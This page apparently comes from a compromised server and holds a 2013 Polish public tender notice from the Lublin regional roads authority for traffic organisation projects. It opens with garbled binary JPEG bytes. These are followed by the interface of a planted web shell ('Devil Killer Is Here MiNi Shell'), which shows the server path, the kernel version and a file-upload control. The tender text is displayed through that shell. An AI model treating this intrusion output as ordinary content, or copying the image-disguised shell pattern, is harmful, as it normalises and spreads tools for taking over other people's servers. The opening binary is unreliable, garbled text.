JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130329/48161-N-2013.html

<p class="kh_header"><b>Lublin: Opracowanie aktualizacji projektów organizacji ruchu w 2013 roku dla odcinków dróg wojewódzkich zarządzanych przez ZDW w Lublinie.</b><br>
<b>Numer ogłoszenia: 48161 - 2013; data zamieszczenia: 29.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich , ul. Turystyczna 7A, 20-207 Lublin, woj. lubelskie, tel. 081 7495300, faks 081 7495341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie aktualizacji projektów organizacji ruchu w 2013 roku dla odcinków dróg wojewódzkich zarządzanych przez ZDW w Lublinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na opracowaniu aktualizacji projektów organizacji ruchu w 2013 roku dla następujących odcinków dróg wojewódzkich zarządzanych przez ZDW w Lublinie:
Zadanie 1 - dr. nr 808 Łuków-Serokomla-Kock 36,551 km, dr. nr 814 Radzyń Podlaski-Suchowola-Żminne 20,928 km, dr. nr 818 Przewłoka-Wyryki-Adampol 40,598 km
Zadanie 2 - dr. nr 834 Bełżyce-Niedrzwica Duża-Bychawa-Stara Wieś III 34,461 km, dr. nr 836 Bychawa-Kębłów 25,978 km, dr. nr 829 Łęczna-Biskupice 18,172 km, dr. nr 838 Głębokie-Dorohucza-Trawniki-Fajsławice 24,797 km, dr. nr 839 Cyców-Siedliszcze-Marynin-Pawłów-Rejowiec 27,895 km
Zadanie 3 - dr. nr 846 Małochwiej Duży-Wojsławice-Teratyn 42,549 km, dr. nr 849 Zamość-Jacnia-Józefów-Wola Obszańska 55,633 km, dr. nr 852 Józefówka-Nowosiółki-Witków 35,549 km, dr. nr 867 (gr. województwa)-Hrebenne 6,210 km
Zadanie 4 - dr. nr 863 (gr. województwa)-Tarnogród-Cieszanów 46,287 km, dr. nr 877 Naklik-(gr. województwa) 1,510 km, dr. nr 741 droga 738-Bronowice Łęka-rz.Wisła-Wólka Gołębska-droga 801 6,460 km, dr. nr 743 Góra Puławska-Karczunki-Sadłowice-Nasiłków-rz.Wisła-Bochotnica-droga 824 9,115 km, dr. nr 825 Kamień-Józefów 9,116 km, dr. nr 854 Annopol-Kosin-(gr. województwa) 14,273 km
dr. nr 855 Olbięcin-(gr. województwa) 10,964 km, dr. nr 857 (gr. województwa)-Modliborzyce 9,895 km
Kod CPV: 71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej.
zgodnie z poniższym opisem:
A. Materiały wyjściowe.
1.Wytyczne do opracowania aktualizacji projektów organizacji ruchu na drogach wojewódzkich województwa lubelskiego w 2013 roku.
2.Wykaz punktów referencyjnych łącznie z opisami topograficznymi.
3.Wyniki pomiarów ruchu przeprowadzonych w 2010 roku.
4.Wykaz wypadków jakie wydarzyły się na w/w drogach z bazy danych ZDW.
5.Projekty organizacji ruchu posiadane przez ZDW w formie elektronicznej.
B. Zakres opracowania.
1.Wykorzystanie otrzymanych z ZDW w Lublinie istniejących projektów organizacji ruchu i materiałów do projektowania w skali 1:1000 (jako skali podstawowej) oraz 1:500 (dla skomplikowanych skrzyżowań oraz na odcinkach leżących w granicach administracyjnych miast) oraz inwentaryzację w terenie i przygotowanie ich w zakresie niezbędnym do realizacji zamówienia zgodnie z Wytycznymi do opracowania aktualizacji projektów organizacji ruchu na drogach wojewódzkich w 2013 roku - pkt. A.1. Profil podłużny drogi w skali 1:100/1000 należy wykonać w oparciu o własne pomiary geodezyjne (wysokościowe) w osi drogi w stopniu pozwalającym na dokonanie analizy widoczności na łukach pionowych.
2.Opracowanie aktualizacji projektów organizacji ruchu, które spełniać będą wymagania zawarte w rozporządzeniu Ministra Infrastruktury z dnia 23 września 2003 roku  w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz.U. Nr 177 z dnia 14 października 2003r., poz. 1729 ) oraz w wyżej wymienionych Wytycznych - pkt A.1. Projekty organizacji ruchu należy opracować w odniesieniu do systemu referencyjnego w formie elektronicznej w postaci plików w formatach DWG i DXF otwieranych przez program AUTOCAD 2008 z opisaniem wprowadzanych elementów (znaki pionowe, poziome, urządzenia bezpieczeństwa ruchu, itp.) na oddzielnych płaszczyznach w sposób umożliwiający automatyczne tworzenie baz danych o tych elementach w uzgodnieniu z ZDW w Lublinie. Każdy z opisanych elementów takich jak znaki drogowe pionowe lub urządzenia bezpieczeństwa ruchu powinny zawierać w rozszerzonym edytorze atrybutów następujące atrybuty: 
status znaku lub urządzenia bezp. ruchu tj. projektowany, istniejący,
nazwa rejonu (administratora drogi), np. RDW Lublin,
data ustawienia (dla znaków proj.) lub inwentaryzacji (dla znaków istniejących),
kilometraż np. km 3+441,
symbol znaku lub urządzenia bezp. ruchu, np. A-7.
3.Uzyskanie wymaganych opinii, tzn. Komendanta Wojewódzkiego Policji w Lublinie 
i organów zarządzających ruchem na drogach krzyżujących się z drogami wojewódzkimi oraz zatwierdzenia projektów organizacji ruchu przez właściwe organy zarządzające ruchem.
C. Ogólne wymagania dotyczące prac.
1.Wykonawca odpowiedzialny jest za jakość prac oraz zgodność ich wykonania 
z obowiązującymi przepisami prawnymi i technicznymi.
2.Projekty muszą uwzględniać stan prawny na dzień przekazania dokumentacji Zamawiającemu.
3.Wykonawca ponosi pełną odpowiedzialność za przestrzeganie przepisów BHP.
4.Sprzęt i materiały stosowane do wykonania prac powinny spełniać wymagania Polskich Norm oraz instrukcji i wytycznych technicznych.
5.Wykonawca nie może wykorzystywać jakichkolwiek wyraźnych błędów lub braków 
w opisie przedmiotu zamówienia na swoją korzyść. W przypadku, gdy Wykonawca wykryje błędy, powiadamia Zamawiającego lub w przypadku kiedy Zamawiający wykryje błędy bądź braki w przedmiocie zamówienia, zgłasza Wykonawcy. Wówczas Wykonawca niezwłocznie, na własny koszt, przystępuje do ich usunięcia w terminie określonym przez Zamawiającego.
D. Skład dokumentacji przekazywanej Zamawiającemu.
1.Trzy egzemplarze projektów (nie licząc egzemplarzy wymaganych na etapie uzgodnień i opinii) w formacie A-3, oprawionych w sztywnych okładkach skoroszytowych (również formatu A-3), umożliwiających wielokrotne wykorzystywanie oraz wyjmowanie pojedynczych stron projektów na papierze o gramaturze 160 g/m2 w tym dwa egzemplarze przygotowane jak wyżej, podzielone na poszczególne Rejony Dróg Wojewódzkich w granicach ich działania.
2.Jeden egzemplarz oddzielnie dla każdego zadania na płycie DVD w formie elektronicznej w formacie DWG z zapisem całego zakresu projektów (z opisem techn., rysunkami, zestawieniami w tabelach, itp.), zaopatrzonej w spis określający szczegółową zawartość (nazwa projektu, nazwa załącznika i nazwa pliku, na którym został zapisany). Wszystkie materiały tekstowe, takie jak opisy techniczne, tabele, należy zapisać w formatach Microsoft Word lub Microsoft Excel oraz na urządzeniu z ekranem dotykowym w formie elektronicznej w formacie PDF, o parametrach minimalnych: Pamięć wewnętrzna: 128 GB, Wyświetlacz Multi-Touch o przekątnej 9,7 cala z podświetleniem LED, w technologii IPS, Rozdzielczość ekranu 2048 na 1536 przy 264 pikselach na cal (ppi), Powłoka oleofobowa odporna na odciski palców, Procesor dwurdzeniowy z czterordzeniowym procesorem graficznym,
Wi-Fi (802.11a/b/g/n; 802.11n w zakresach 2,4 GHz i 5 GHz), Interfejs Bluetooth 4.0, CDMA EV-DO Rev. A i Rev. B, GSM/EDGE, UMTS/HSPA/HSPA+/DC-HSDP, LTE,
Nagrywanie wideo w formacie HD 1080p, Kamera Tył: video HD 1080p, foto: 5MPix, optyka 5-częściowa, ISP Przód: wideo 720p 30fps, foto 1.2 MPix,
E. Odbiór prac.
1.Wykonawca przekazuje Zamawiającemu całość dokumentacji (jej skład jak podano w pkt. D jw.) opracowanych zgodnie z zakresem podanym w pkt. B, w przewidzianym dla zadań terminie (zgodnie z pkt. IV) w siedzibie Zamawiającego.
Należność za prace projektowe będzie uregulowana po zatwierdzeniu projektów 
i przekazaniu całości dokumentacji.
Należy przewidzieć czas niezbędny na sprawdzenie projektów oraz ich zatwierdzenie - min. 1 miesiąc (przed ich przekazaniem Zamawiającemu). 
W przypadku stwierdzenia błędów lub usterek w projektach będą one odsyłane w celu dokonania poprawy. Czas przewidziany na zatwierdzenie będzie liczył się od momentu ich ponownego złożenia z naniesionymi poprawkami.
2.Zamawiający dopuszcza możliwość składania ofert częściowych na pojedyncze Zadania. Wykonawca może złożyć ofertę na wykonanie jednego lub kilku wybranych przez siebie Zadań.
Wartość zamówienia - 238.470,50 zł netto..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości: 
500,00 zł (słownie złotych: pięćset 00/100) na każde zadanie.
W przypadku złożenia oferty na wykonanie kilku zadań Wykonawca winien wnieść odpowiednią wielokrotność kwoty 500,00 zł.
2.Wadium może być wnoszone w jednej lub kilku następujących formach  zgodnie 
z  art. 45, ust. 6 ustawy Prawo zamówień publicznych:
1)Pieniądzu;
2)Poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)Gwarancjach bankowych;
4)Gwarancjach ubezpieczeniowych;
5)Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158, z późń. zm.)
3.Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW 
w Lublinie w Kredyt Banku S.A. O/Lublin nr 89 1500 1520 1215 2004 1596 0000.
4.W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
1.Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez zamawiającego. W myśl art. 63. ust. 3 pkt.1  ustawy Prawo bankowe z dnia 29 sierpnia 1997 (Dz. U z 2002 Nr 72 poz. 665 j. t.) polecenie przelewu jest jedną 
z form rozliczenia bezgotówkowego.  Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. 
Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
2.Wadium wnoszone przelewem (art. 45 ust. 7 ustawy pzp) uważa się za wniesione 
w terminie jeżeli wpłynie na konto ZDW w Lublinie przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału polegającego na posiadaniu wiedzy i doświadczenia w oparciu o załącznik - Wykaz wykonanych usług. Warunek zostanie uznany za spełniony gdy Wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum 2 usługi opracowania projektów stałej organizacji ruchu lub ich aktualizacji dla dróg wojewódzkich lub krajowych o zakresie nie mniejszym niż 50 km długości dla każdej usługi i udokumentuje, że usługi zostały wykonane należycie.
W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu podmiotów Zamawiający żąda dołączenia do oferty pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Przez pisemne zobowiązanie podmiotu trzeciego rozumie się oryginał zobowiązania lub kserokopię zobowiązania poświadczoną, za zgodność z oryginałem przez ten podmiot (zgodnie z wyrokami KIO nr;  KIO 786/11, KIO 787/11, KIO 797/11, KIO 830/11, KIO 1008/11)  
UWAGA!
1)W przypadku gdy Wykonawca polega na zasobach innych podmiotów jego obowiązkiem jest udowodnienie, że rzeczywiście będzie dysponował wskazanymi zasobami w czasie realizacji zamówienia. W tym celu Wykonawca przedstawi Zamawiającemu dokumenty zawierające informacje dotyczące: zakresu zasobów jakie zostają mu udostępnione przez inny podmiot, sposobu wykorzystania  zasobów innego podmiotu, charakteru stosunku, jaki łączy Wykonawcę z innym podmiotem, zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
2)Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji  niezbędnych zasobów winno posiadać formę pisemną,  stosowną treść, z której będzie wynikało, że podmiot ten zobowiązał się do udostępnienia określonych zasobów na okres korzystania z nich przy wykonaniu zamówienia oraz dla swej skuteczności musi zostać złożone przez osobę/osoby uprawnione do reprezentowania podmiotu trzeciego w powyższym zakresie. Zobowiązanie złożone przez osobę nieuprawnioną nie dowodzi udostępnienia zasobu przez podmiot trzeci.(Zgodnie z wyrokiem KIO2213/11)
W przypadku  Wykonawców wspólnie ubiegających się o udzielenie zamówienia w/w warunki udziału mogą być spełnione łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykonanie w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum 2 usługi opracowania projektów stałej organizacji ruchu lub ich aktualizacji dla dróg wojewódzkich lub krajowych o zakresie nie mniejszym niż 50 km długości dla każdej usługi i udokumentuje, że usługi zostały wykonane należycie.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dowód wniesienia wadium.
2. Ofertę przetargową (z ceną netto i z podatkiem VAT).
3. Wykaz części zamówienia, których wykonanie Wykonawca powierzy podwykonawcy.
4. W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
5. W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, polegających na:
1.Wszelkie zmiany niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną  na piśmie w formie aneksu do umowy, pod rygorem nieważności.
2.Zamawiający przewiduje możliwość dokonania zmian postanowień niniejszej umowy w stosunku do treści oferty polegających na:
1)zmianie terminu wykonania umowy w przypadku gdy:
a) zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy;
b)przedłużeniu uległy procedury na etapie wydawania opinii i uzgodnień;
c)warunki atmosferyczne nie pozwoliły na sporządzenie materiałów przedprojektowych (np. inwentaryzacji, opracowań geodezyjnych i innych);
d)w przypadku wniesienia przez wykonawcę/wykonawców, po upływie terminu składania ofert odwołania do Prezesa Krajowej Izby Odwoławczej. Termin wykonania umowy wydłuża się o liczbę dni odpowiadającą okresowi zawieszenia terminu związania ofertą.
2)zmianie wynagrodzenia umowy w przypadku gdy:
a)zmianie uległy stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zdw.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać w siedzibie Zamawiającego, lok. 203, lub pocztą elektroniczną po wcześniejszym przesłaniu zamówienia na adres:dzp@zdw.lublin.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2013 godzina 10:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, ul. Turystyczna 7a, pok. 107 Otwarcie ofert nastąpi w dniu 10.04.2013 o godz.10:30 w pok. 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Od Wykonawcy, któremu zostanie przyznane zamówienie, Zamawiający będzie żądał złożenia zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny ofertowej brutto zamówienia.
2.Zabezpieczenie należytego wykonania umowy może być wnoszone w:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym.
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.Zamawiający nie wyraża zgody na wnoszenie zabezpieczenia w innej formie.
4.Zabezpieczenie należytego wykonania umowy należy złożyć przed podpisaniem umowy.
5.Zamawiający dopuszcza, jako zabezpieczenie należytego wykonania umowy, pozostawienie wadium wniesionego w pieniądzu uzupełnionego do wysokości zabezpieczenia.
6. Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr (081) 749-53-41; (081) 749-53-77 lub drogą elektroniczną na adres e-mail: dzp@zdw.lublin.pl. 
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
7. Językiem do porozumiewania się jest język polski.
8. Osoby uprawnione do porozumiewania się z wykonawcami: 
W zakresie przedmiotu zamówienia - Wydział Inżynierii Ruchu, Tadeusz Bień, tel. (0-81) 749-53-16, 
